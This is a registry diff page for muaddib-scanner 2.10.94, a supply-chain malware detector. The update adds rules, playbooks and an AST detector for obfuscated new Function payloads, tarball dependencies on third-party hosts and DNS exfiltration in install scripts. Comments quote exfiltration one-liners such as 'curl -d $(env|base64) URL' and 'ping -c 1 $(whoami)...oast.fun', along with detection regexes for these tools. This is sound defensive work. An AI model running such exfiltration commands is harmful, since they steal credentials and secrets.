npm - muaddib-scanner - Versions diffs - 2.10.93 → 2.10.94 - Mend

muaddib-scanner 2.10.93 → 2.10.94

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

package/package.json +1 -1
package/src/monitor/classify.js +4 -1
package/src/response/playbooks.js +10 -0
package/src/rules/index.js +24 -0
package/src/scanner/ast-detectors/handle-new-expression.js +29 -0
package/src/scanner/package.js +10 -3
package/src/scoring.js +15 -1

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.93",
+  "version": "2.10.94",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/monitor/classify.js CHANGED Viewed

@@ -63,7 +63,10 @@ const HIGH_CONFIDENCE_MALICE_TYPES = new Set([
   'function_constructor_require',          // new Function.constructor("require") (RCE evasion)
   'newsletter_auto_follow',                // Baileys WhatsApp newsletter hijack
   // v2.10.93: Security review 2026-04-10→17 findings
-  'self_destruct_eval'                     // dynamic exec + unlink __filename (csec anti-forensics)
+  'self_destruct_eval',                    // dynamic exec + unlink __filename (csec anti-forensics)
+  // v2.10.94: MT-1 ceiling bypass for ltidi and csec under-threshold cases
+  'external_tarball_dep',                  // dep URL = tarball on third-party host (ltidi chain)
+  'function_runtime_args'                  // new Function('require','__dirname','__filename',...) pattern (csec)
 ]);
 // Lifecycle compound types that indicate real malicious intent beyond a simple postinstall

package/src/response/playbooks.js CHANGED Viewed

@@ -886,6 +886,16 @@ const PLAYBOOKS = {
     'CRITIQUE: Execution dynamique de code (eval/new Function/Module._compile) + auto-suppression du fichier execute (unlinkSync/renameSync sur __filename). ' +
     'Pattern anti-forensique professionnel: le malware execute son payload obfusque puis efface ses traces. Campagne csec-crypto-toolkit (avril 2026) exfiltre .env, GITHUB_TOKEN, NPM_TOKEN, AWS/SSH keys vers csec-supply-chain-attack.vercel.app, puis unlinkSync(__filename). ' +
     'Machine compromise si deja installe. Rotation immediate de TOUS les secrets (.env, tokens CI/CD, cles SSH). Verifier les .env des repertoires parents jusqu\'a 6 niveaux. Supprimer le package.',
+  function_runtime_args:
+    'CRITIQUE: new Function() appele avec les identifiants runtime Node (require, __dirname, __filename) passes comme arguments string literal + corps dynamique. ' +
+    'Pattern csec-crypto-toolkit: l\'attaquant injecte le contexte Node complet dans un payload obfusque execute en memoire, contournant la detection de require() standard. Aucun package legitime n\'utilise ce pattern. ' +
+    'Lire le contenu de l\'argument body. Tracer la source (souvent XOR/base64 decode). Isoler et supprimer.',
+  external_tarball_dep:
+    'CRITIQUE: Dependance declaree avec URL tarball (.tgz/.tar.gz) hebergee hors des registres npm legitimes (github.com, gitlab.com, bitbucket.org, registry.npmjs.org). ' +
+    'Pattern ltidi chain attack (avril 2026): le stub publie sur npm n\'a aucun install hook visible, la charge utile est hebergee sur un cloud storage (GCS, S3, CDN) et contourne entierement l\'audit du registre npm. ' +
+    'Verifier le contenu de la tarball distante avant toute installation. Supprimer le package. Signaler au registre npm.',
 };
 function getPlaybook(threatType) {

package/src/rules/index.js CHANGED Viewed

@@ -2276,6 +2276,30 @@ const RULES = {
     ],
     mitre: 'T1070.004'
   },
+  function_runtime_args: {
+    id: 'MUADDIB-AST-090',
+    name: 'Function() with Runtime Identifiers as Arguments',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'new Function() appele avec des identifiants runtime (require, __dirname, __filename, module, exports, process) passes comme arguments string literal, et un corps dynamique (variable, expression). Pattern csec-crypto-toolkit: l\'attaquant injecte le contexte Node complet dans un payload obfusque execute en memoire, contournant la detection require() standard. Aucun package legitime ne passe require + __filename a new Function.',
+    references: [
+      'https://attack.mitre.org/techniques/T1059.007/',
+      'https://attack.mitre.org/techniques/T1027/'
+    ],
+    mitre: 'T1059.007'
+  },
+  external_tarball_dep: {
+    id: 'MUADDIB-PKG-020',
+    name: 'External Tarball Dependency URL',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Dependance declaree avec une URL tarball (.tgz/.tar.gz/.tar.bz2/.zip) hebergee hors des registres npm legitimes (github.com, gitlab.com, bitbucket.org, registry.npmjs.org, registry.yarnpkg.com). Pattern ltidi chain attack (avril 2026): le stub publie sur npm n\'a pas d\'install hook visible, la charge utile est hebergee sur un cloud storage (GCS, S3, CDN) et contourne entierement l\'audit du registre npm. Attention: MT-1 score ceiling (cap non-lifecycle a 35) bypasse via HIGH_CONFIDENCE_MALICE_TYPES.',
+    references: [
+      'https://attack.mitre.org/techniques/T1195.002/',
+      'https://attack.mitre.org/techniques/T1105/'
+    ],
+    mitre: 'T1195.002'
+  },
   version_99_preinstall: {
     id: 'MUADDIB-PKG-019',
     name: 'Dependency Confusion Version Indicator',

package/src/scanner/ast-detectors/handle-new-expression.js CHANGED Viewed

@@ -11,6 +11,35 @@ const {
 function handleNewExpression(node, ctx) {
   if (node.callee.type === 'Identifier' && node.callee.name === 'Function') {
+    // v2.10.94: detect new Function('require', '__dirname', '__filename', <dynamic>)
+    // csec-crypto-toolkit pattern. Gated by obfuscation signal to avoid FP on
+    // legitimate CommonJS module wrappers used by babel-register, ts-node, pirates,
+    // jest, nyc, vitest etc. which call new Function('module', 'exports', 'require',
+    // compiledCode). Those transpilers DO NOT have fromCharCode/base64 decode loops
+    // in the same file — csec does.
+    if (node.arguments.length >= 3) {
+      const RUNTIME_ARG_NAMES = new Set(['require', '__dirname', '__filename', 'module', 'exports', 'process']);
+      const bodyArg = node.arguments[node.arguments.length - 1];
+      const argNameLiterals = node.arguments.slice(0, -1)
+        .map(a => (a.type === 'Literal' && typeof a.value === 'string') ? a.value : null);
+      const runtimeArgCount = argNameLiterals.filter(v => v !== null && RUNTIME_ARG_NAMES.has(v)).length;
+      const bodyIsDynamic = bodyArg.type !== 'Literal';
+      // FP gate: require an obfuscation/decode signal in the same file.
+      // ctx.hasFromCharCode catches XOR/charcode loops (csec).
+      // ctx.hasBase64Decode catches Buffer.from(..., 'base64') patterns.
+      // ctx.hasZlibInflate catches zlib + base64 payloads.
+      const hasObfuscationContext = ctx.hasFromCharCode || ctx.hasBase64Decode || ctx.hasZlibInflate;
+      if (runtimeArgCount >= 2 && bodyIsDynamic && hasObfuscationContext) {
+        ctx.hasDynamicExec = true;
+        ctx.threats.push({
+          type: 'function_runtime_args',
+          severity: 'CRITICAL',
+          message: `new Function() passes runtime identifiers (${argNameLiterals.filter(Boolean).join(', ')}) to a dynamic body in a file containing decode/obfuscation patterns — csec-style obfuscated payload with full Node.js context.`,
+          file: ctx.relFile
+        });
+        return;
+      }
+    }
     // Skip string literal args — zero-risk globalThis polyfills used by every bundler
     if (!hasOnlyStringLiteralArgs(node)) {
       ctx.hasDynamicExec = true;

package/src/scanner/package.js CHANGED Viewed

@@ -119,15 +119,17 @@ async function scanPackageJson(targetPath) {
       // v2.10.89: curl/wget + env/base64 exfiltration in lifecycle scripts
       // Catches: apache-arrow-14 (score 9→CRITICAL), @signals-notebook (score 9→CRITICAL)
       // Pattern: curl -d $(env|base64) URL, curl -X POST URL?env=$(env|base64 -w0)
+      // v2.10.94: extended to ping/nslookup/dig/host/getent — DNS exfil variants.
+      // Catches: koa-v3@9.4.0 which uses `ping -c 1 $(whoami).<hex>.oast.fun` instead of curl.
       if (['preinstall', 'install', 'postinstall'].includes(scriptName) &&
-          /\b(curl|wget)\b/.test(scriptContent) &&
+          /\b(curl|wget|ping|nslookup|dig|host|getent)\b/.test(scriptContent) &&
           (/\$\(.*\b(env|id|whoami|uname|hostname)\b/.test(scriptContent) ||
            (/\bbase64\b/.test(scriptContent) && !/\|\s*(sh|bash)\b/.test(scriptContent)))) {
         // Exclude curl|sh which is already caught by lifecycle_shell_pipe
         threats.push({
           type: 'curl_env_exfil',
           severity: 'CRITICAL',
-          message: `Critical: "${scriptName}" uses curl/wget with env/base64 exfiltration — credential theft via lifecycle script.`,
+          message: `Critical: "${scriptName}" uses DNS/HTTP exfil tool (curl/wget/ping/nslookup/dig) with env/base64 payload — credential theft via lifecycle script.`,
           file: 'package.json'
         });
       }
@@ -355,8 +357,13 @@ async function scanPackageJson(targetPath) {
         note = ' (unusual, verify source)';
       }
+      // v2.10.94: External tarball on third-party host emits a distinct type
+      // so MT-1 score ceiling (caps non-lifecycle, non-HC packages at 35) can be
+      // bypassed via HIGH_CONFIDENCE_MALICE_TYPES. ltidi stubs have no install
+      // hooks, so the dep URL is the only signal and must be HC-classified.
+      const threatType = isExternalTarball ? 'external_tarball_dep' : 'dependency_url_suspicious';
       threats.push({
-        type: 'dependency_url_suspicious',
+        type: threatType,
         severity,
         message: `Dependency "${depName}" uses HTTP URL: ${depVersion}${note}`,
         file: 'package.json'

package/src/scoring.js CHANGED Viewed

@@ -118,7 +118,9 @@ const PACKAGE_LEVEL_TYPES = new Set([
   'lifecycle_missing_script',
   // v2.10.89: Security review compounds
   'lifecycle_newsletter_hijack', 'lifecycle_env_exfil',
-  'curl_env_exfil', 'version_99_preinstall'
+  'curl_env_exfil', 'version_99_preinstall',
+  // v2.10.94: new package-level type for ltidi chain attack (dep URL on third-party host)
+  'external_tarball_dep'
 ]);
 /**
@@ -254,6 +256,8 @@ const DIST_EXEMPT_TYPES = new Set([
   'curl_env_exfil',           // curl/wget env exfil in lifecycle (always malicious)
   'function_constructor_require', // new Function.constructor("require") (always malicious)
   'self_destruct_eval',       // dynamic exec + unlink __filename (csec anti-forensics)
+  'function_runtime_args',    // new Function('require','__dirname','__filename',...) + obfuscation (csec)
+  'external_tarball_dep',     // dep URL tarball on third-party host (ltidi chain)
   // Dangerous shell commands in dist/ are real threats, never bundler output
   'dangerous_exec',
   // Compound scoring rules — co-occurrence signals, never FP
@@ -894,6 +898,16 @@ function calculateRiskScore(deduped, intentResult) {
   if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL')) {
     packageScore = Math.max(packageScore, 50);
   }
+  // v2.10.94: Co-occurrence floor — 2+ distinct CRITICAL package-level types (different
+  // threat types, not duplicates) is a near-unambiguous malware signature. Lifts to 75
+  // (CRITICAL tier) so the final risk level reflects real severity instead of stopping
+  // at HIGH. Catches apache-arrow-14 (curl_env_exfil + lifecycle_env_exfil compound).
+  const criticalPkgTypes = new Set(
+    packageLevelThreats.filter(t => t.severity === 'CRITICAL').map(t => t.type)
+  );
+  if (criticalPkgTypes.size >= 2) {
+    packageScore = Math.max(packageScore, 75);
+  }
   // 5. Cross-file bonus: aggregate signal from non-max files
   // A package with 3 files each scoring 20 is more suspicious than 1 file scoring 20.